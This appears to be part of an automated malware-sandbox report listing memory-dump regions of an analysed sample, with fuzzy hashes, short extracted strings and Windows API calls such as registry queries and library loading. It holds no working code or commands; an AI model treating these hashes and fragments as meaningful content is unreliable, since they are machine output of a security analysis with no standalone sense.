                                  • Instruction ID: fe090d7970e99943037eb8ef174f9712ff0511d38c6df8df5374d2d347aab94f
                                  • Opcode Fuzzy Hash: f6a0bf6d3068174a2b88b01ff38e7690869309a85c4b884fc6ed8101c93cc75a
                                  • Instruction Fuzzy Hash: 9F914770D24219DFCB44DFE5D6815AEFBB1FF8A300F20A52AD406BB214DB789A518F84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a534cf111035108662c4dd39c6e00df2d5c9c1165c129d66f28bb801e5e4c9e
                                  • Instruction ID: 6ca2b9b21a77ff0313d949a0795e83ec7b58717a780e7eacb0a7de142a2f8d20
                                  • Opcode Fuzzy Hash: 6a534cf111035108662c4dd39c6e00df2d5c9c1165c129d66f28bb801e5e4c9e
                                  • Instruction Fuzzy Hash: D1D2A534A01658CFC765DB24C898BEDB7B1FF8A305F6052E9E4096B2A0DB716E84CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 94c7d4194aa9fef630666412318123e004516af14740d41aa283991ac7a716ce
                                  • Instruction ID: 8fb92b04ec73dec9d4cd9462b2eb42b6459afa6871eaf4415d12b7099ee0729f
                                  • Opcode Fuzzy Hash: 94c7d4194aa9fef630666412318123e004516af14740d41aa283991ac7a716ce
                                  • Instruction Fuzzy Hash: C0C15A70D2520ADFCB04CFA4D5848AEFBB1FF4A310B209559C416BB325DB74AA91CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57b15002eb9e469d5f6e79517b06ff0e1f1e616db6319bf0b4c36ceee3502086
                                  • Instruction ID: cf9512765f26ba273144e57645d2a048dee10e0f4d46621c969f6d3930301e03
                                  • Opcode Fuzzy Hash: 57b15002eb9e469d5f6e79517b06ff0e1f1e616db6319bf0b4c36ceee3502086
                                  • Instruction Fuzzy Hash: DA9133B0D15609DFCB04DFAAD5805AEFBF2BF8A310F24C12AD425AB254DB349A41CF94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 836904e9b11ff72dca3d7397335e54eb06b5af514a40b2349664bca54f585e8a
                                  • Instruction ID: f8555858d8cc361240ca85c59470909f0fae8617f4b4171331d0603eb395ab49
                                  • Opcode Fuzzy Hash: 836904e9b11ff72dca3d7397335e54eb06b5af514a40b2349664bca54f585e8a
                                  • Instruction Fuzzy Hash: 917159B0D019188FCB04DFEAD5845AEFBF2BF99320F28C165E464AB355DB349A11CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7847effe9ef8391faea44d92e5c40571919768ee81cc49e5b444b6f969631a3
                                  • Instruction ID: a160be01be5763410cce14b0e8318dc65c7c9574f33f5405840568adb2a98d58
                                  • Opcode Fuzzy Hash: d7847effe9ef8391faea44d92e5c40571919768ee81cc49e5b444b6f969631a3
                                  • Instruction Fuzzy Hash: 9671DF74E11219DFCB08CFA5D984AAEFBB2FF89300F24952AD405BB254DB749A41CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 292d31fddc825dd47dae2f131b691671e99c4f16e7f7cce4c7744ab527f5760f
                                  • Instruction ID: de778d3a4777660a8d5f6ab4533dd9af42e0d1d336d857cc295bc87425455589
                                  • Opcode Fuzzy Hash: 292d31fddc825dd47dae2f131b691671e99c4f16e7f7cce4c7744ab527f5760f
                                  • Instruction Fuzzy Hash: 74515870D142199BDB00CFA5C980AAEFBB2BF8A310F24C56AD416B7654DB749A10CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39586ec789f2dae03c90a2f7c8b9d66be14d6a90d63be8805ee8f50895709903
                                  • Instruction ID: 62d91795d016b6ddb05711bb956ff0c952f2741fff611c5a08cca6c3ebf6cdbe
                                  • Opcode Fuzzy Hash: 39586ec789f2dae03c90a2f7c8b9d66be14d6a90d63be8805ee8f50895709903
                                  • Instruction Fuzzy Hash: 51516D71D192098FCB04CFE5D8806AEFBF2FF8A300F24906AD855B7255C7349A51CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0197c40463dbe55f772e822d29be1b68373ae36cd68113ded7d24236f004fe0
                                  • Instruction ID: 4f88e3cc2350c2aae33c6c4e8436ebf3870ed78af7ea9bafd1f091038d29e3fa
                                  • Opcode Fuzzy Hash: d0197c40463dbe55f772e822d29be1b68373ae36cd68113ded7d24236f004fe0
                                  • Instruction Fuzzy Hash: C6417DB0D019188FDB04DFEAD58069EFBF2BF99320F14C169E414AB355DB349A11CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ee46e1a39865192e57942b26b4fc552f23a4c367748e6fae54f895e80a8afc9
                                  • Instruction ID: d265b743c746b8ab8fb5de7f8c35a7a7ca2f48c3ed74d8f8b2f9d3b8dc0cc86b
                                  • Opcode Fuzzy Hash: 5ee46e1a39865192e57942b26b4fc552f23a4c367748e6fae54f895e80a8afc9
                                  • Instruction Fuzzy Hash: 9721F9B0D046588BDB19CFA6C85478EFBF3AFC9300F14C06AD408AB265DB740A45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: (b $(b $(b $(b
                                  • API String ID: 0-1323414954
                                  • Opcode ID: 369696caeae05bb082ff3741001f8abdd229a3c2159b8f95e2e500dd69193bb6
                                  • Instruction ID: ba86f378a7424b390c0421f45357ff66c2d771a88d0a10dfd8d3cbf1b677a4eb
                                  • Opcode Fuzzy Hash: 369696caeae05bb082ff3741001f8abdd229a3c2159b8f95e2e500dd69193bb6
                                  • Instruction Fuzzy Hash: 25419C78A10209DFDF04CFA8C984BADBBF1AF4E310F1054A5E902AB3A0D778A954DF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: :@lq$\, $he
                                  • API String ID: 0-487991920
                                  • Opcode ID: bb51c5971a051eb4bcd558ae59bf6fd19dc628fd699bcbb1e268f79ad5c7ae89
                                  • Instruction ID: fe85173b9a72bad290597e6ef8cbc69bb8f0e2ba205c1fe81f1b54f729027f55
                                  • Opcode Fuzzy Hash: bb51c5971a051eb4bcd558ae59bf6fd19dc628fd699bcbb1e268f79ad5c7ae89
                                  • Instruction Fuzzy Hash: F791F274E11219CFEB14DFA8C894BADBBF1BF8A314F204069D409AB391DB70A995CF11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116924683.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: k(l$k(l
                                  • API String ID: 0-4029483140
                                  • Opcode ID: 147ab96e807c07b4110f7761d908461648895a4e45a6a82d7bac07c80f2c7270
                                  • Instruction ID: 2f42906df7baf46b38b37265e7365478894c3188245118a114886498cb624851
                                  • Opcode Fuzzy Hash: 147ab96e807c07b4110f7761d908461648895a4e45a6a82d7bac07c80f2c7270
                                  • Instruction Fuzzy Hash: AD01D97584122CCECB209F60C889BDDBBB1BB28304F2091D9D109A3250C3358B86CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001FABD5
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: ab263dc1ea80d4c61edf5820918e63d65bacb29af5c406a253ebd61a40efc7c1
                                  • Instruction ID: dc8874626ada4387577278b0631e4563bb5a1de632299275d8a7a6429e34a904
                                  • Opcode Fuzzy Hash: ab263dc1ea80d4c61edf5820918e63d65bacb29af5c406a253ebd61a40efc7c1
                                  • Instruction Fuzzy Hash: 7F31B4B2544384AFE722CF11CC45FA7BFACEF06350F0885ABF9858B152D265A909C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,E33F803A,00000000,00000000,00000000,00000000), ref: 001FACD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: d6d07213c9439d15e21e1f2f609aa5dd6f5a22876abfe9d4f3ed24e1d309bbbb
                                  • Instruction ID: 05843b963d3186fcdd5081438db8e99df4ac09180b8255925c893cc055ebaffb
                                  • Opcode Fuzzy Hash: d6d07213c9439d15e21e1f2f609aa5dd6f5a22876abfe9d4f3ed24e1d309bbbb
                                  • Instruction Fuzzy Hash: CD319175105784AFE722CF21CC45FA2BFB8EF06350F08849AE989CB153D364E949CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 001FB10E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0
                                  • Opcode ID: 16bc25d8a05e8d205623405eadab8c821dd8cdebec06185d3c3cc466434b9b0e
                                  • Instruction ID: c602db145406791eb273c00b9618dd90823479cd91bc6caa4e508c41d4985d6b
                                  • Opcode Fuzzy Hash: 16bc25d8a05e8d205623405eadab8c821dd8cdebec06185d3c3cc466434b9b0e
                                  • Instruction Fuzzy Hash: 2E316F7140E7C06FD3138B259C61B62BFB4EF47650F0A41DBE884CB6A3D229A919C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 001FABD5
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 452277b5d2d64d54b632a22ee3c7793f71885d4837e437741096a6bceee58f54
                                  • Instruction ID: ec3e723c2f92e7d4463d06e3b4efc25a735d05e6924856ea28fbc5a4e62dbb19
                                  • Opcode Fuzzy Hash: 452277b5d2d64d54b632a22ee3c7793f71885d4837e437741096a6bceee58f54
                                  • Instruction Fuzzy Hash: 4821A1B2500704EFFB20DF11DC85FABF7ACEF04750F04855AFA499A241D635E9088AB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,E33F803A,00000000,00000000,00000000,00000000), ref: 001FACD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: f5e7826ed8de038ef22b4cf631aeafa0cad31e663c52726c9520b662609e5793
                                  • Instruction ID: cd0c7879936311b0687674a8991e430485ed376f67a9368085852218c983edb4
                                  • Opcode Fuzzy Hash: f5e7826ed8de038ef22b4cf631aeafa0cad31e663c52726c9520b662609e5793
                                  • Instruction Fuzzy Hash: B1219DB5200708EFEB20CF15CC85FA6B7ECEF04750F48856AEA499B651D764E908CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 002C0083
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: 0230e15b590580637b7d195bf403be4b35ef24ba89b97e97fd15faaf83b44abc
                                  • Instruction ID: 9eebecabce57f06b565942197d76f64476c745f1b162946c31fb42a79ab05746
                                  • Opcode Fuzzy Hash: 0230e15b590580637b7d195bf403be4b35ef24ba89b97e97fd15faaf83b44abc
                                  • Instruction Fuzzy Hash: ED217F715047849FDB22CF25DC45F62BFF4EF06310F0984AAE9848B263D275E818CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 001FB4E9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: af12f90520a4e8864cfbbb027f380ec9025b9a11892348a9e2474b8b1425e608
                                  • Instruction ID: e131a9b38827a9b194201f1b8f0b625ddb3e656c16e50ac038492cac738a1f42
                                  • Opcode Fuzzy Hash: af12f90520a4e8864cfbbb027f380ec9025b9a11892348a9e2474b8b1425e608
                                  • Instruction Fuzzy Hash: F02193B15087849FD7228E15DC85B62BFE8EF56714F08809AED858B253D365E808C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: 86560c3e6381ee89a124a722ca115dd03e834db97c994764178dfdfa30ba271b
                                  • Instruction ID: 1fb5cafd85f7c56c073a32dc069282c355efd4a40acc55ab8142d91798b7b37c
                                  • Opcode Fuzzy Hash: 86560c3e6381ee89a124a722ca115dd03e834db97c994764178dfdfa30ba271b
                                  • Instruction Fuzzy Hash: 9E215E715093C49FD712CB25DC85BA2BFE4EF06210F0984EAD989CF263D265A908CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ea001267e4d7da5ac0d5387bd7e3a1b5ed4ace300ecac7f434dada6c3d7954ea
                                  • Instruction ID: 3f1861eb4575f940792aa99279c59aa41d22fbd19b0b407ae53f1748954f8da6
                                  • Opcode Fuzzy Hash: ea001267e4d7da5ac0d5387bd7e3a1b5ed4ace300ecac7f434dada6c3d7954ea
                                  • Instruction Fuzzy Hash: 6F219D715093C09FDB238F25DC44A92BFB4EF17310F0985DBE9848F563D225A818DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001FA61A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: c8855151d9eb04763be7124f0d7d329b38e74b8f11617f62c75556a5805498c0
                                  • Instruction ID: a8e8327a2ae8343fc9472bddaa46a09f1b5fff047579650aadb8cde8adf4aef3
                                  • Opcode Fuzzy Hash: c8855151d9eb04763be7124f0d7d329b38e74b8f11617f62c75556a5805498c0
                                  • Instruction Fuzzy Hash: 09117271409780AFDB228F51DC44A62FFF4EF5A320F08849AEE898B552D375A418DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 001FA6CC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 81bc9b2688b0ae0d3ddb73f083619e44d39a54abdbc64b7dcc59091d5069f26f
                                  • Instruction ID: 91ae4dfd0c1ae4cb3b706568a1be64a9c1c5c262cb412ec57306ca10416c68d9
                                  • Opcode Fuzzy Hash: 81bc9b2688b0ae0d3ddb73f083619e44d39a54abdbc64b7dcc59091d5069f26f
                                  • Instruction Fuzzy Hash: B4116A7540D3C49FD7128B25CC95A92BFB4EF17220F0E80DBD9858F1A3D2695908CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  • Opcode ID: 2dd115d54ed6a8dbf21b1f5086b5ce4710aaee1d7a861b34dc92cac805ba6fca
                                  • Instruction ID: b576adbc9bb6894b7d351c034ce5b65bbc425b3f09ce68f64a30d739d56f6b2c
                                  • Opcode Fuzzy Hash: 2dd115d54ed6a8dbf21b1f5086b5ce4710aaee1d7a861b34dc92cac805ba6fca
                                  • Instruction Fuzzy Hash: 771104765097C09FD7128F25DC85B52BFB4EF17210F0880EBDD858F263D265A918CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: eb60c9a16b423932f8a8da47312125492398daa67203a6a0aae7b2ce960c809c
                                  • Instruction ID: 5d3a2f9ac00090e91534cf6d2c05e91411d967b7ae4636f008da1dbf601a8905
                                  • Opcode Fuzzy Hash: eb60c9a16b423932f8a8da47312125492398daa67203a6a0aae7b2ce960c809c
                                  • Instruction Fuzzy Hash: 5011BE71508380AFDB228F11DC45F52BFB4EF16324F0880EEED854B663C265A818DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 002C0083
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: 4aaf6f94c1dc630874cd72affeda88a15ca93ac170c91095c0ef0c8ba85e171c
                                  • Instruction ID: ea45ad8a6300753bf131d9a3472698a02d48d7e6a8aabf6970a988eb68913fc6
                                  • Opcode Fuzzy Hash: 4aaf6f94c1dc630874cd72affeda88a15ca93ac170c91095c0ef0c8ba85e171c
                                  • Instruction Fuzzy Hash: BE119A31510704DFEB20CF65D884F62FBE4EF04310F0885AADD498B612E375E814CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 001FB4E9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: 7c52c2f84d89a3ed388ec78e524469cf60e3f6b42210d8fd97a029e1d5916e7e
                                  • Instruction ID: 4345ba4bd02e2c6e5eff128fad241d8820f29789389fffc06bda102056fbd395
                                  • Opcode Fuzzy Hash: 7c52c2f84d89a3ed388ec78e524469cf60e3f6b42210d8fd97a029e1d5916e7e
                                  • Instruction Fuzzy Hash: 47018C71604704DFEB20CF16D985B32FBE4EF14720F0880A9DE4A8B652D375E804DA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001FA61A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 53088e63d1c4b0d4d81a2886427bb266939a4d593d55074dc5e50e816405df3b
                                  • Instruction ID: 808d3c2c20db819d166ee5b5ef6811eb00eacdcd8c01ffb5753ae2e725158f5c
                                  • Opcode Fuzzy Hash: 53088e63d1c4b0d4d81a2886427bb266939a4d593d55074dc5e50e816405df3b
                                  • Instruction Fuzzy Hash: 02016D72400704DFEB218F55D845B62FFE0EF18720F48C5AADE498A612D376A414DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: e90c0be4fe7fac26013a74556b78d5bc91a6ee3a59bc463e563325c0bd4345a7
                                  • Instruction ID: 2313829194013d8772dba80ba3150367f5293fc8f8160b559a5c60633979e60c
                                  • Opcode Fuzzy Hash: e90c0be4fe7fac26013a74556b78d5bc91a6ee3a59bc463e563325c0bd4345a7
                                  • Instruction Fuzzy Hash: 0001BC71904344DFEB10CF15DDC57B2FB94EF00720F4880AADE098B642D779E804CA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 001FB10E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 001FA6CC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b-F
                                  • API String ID: 0-193427478
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li
                                  • API String ID: 0-160456080
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li
                                  • API String ID: 0-160456080
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-4260565401
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

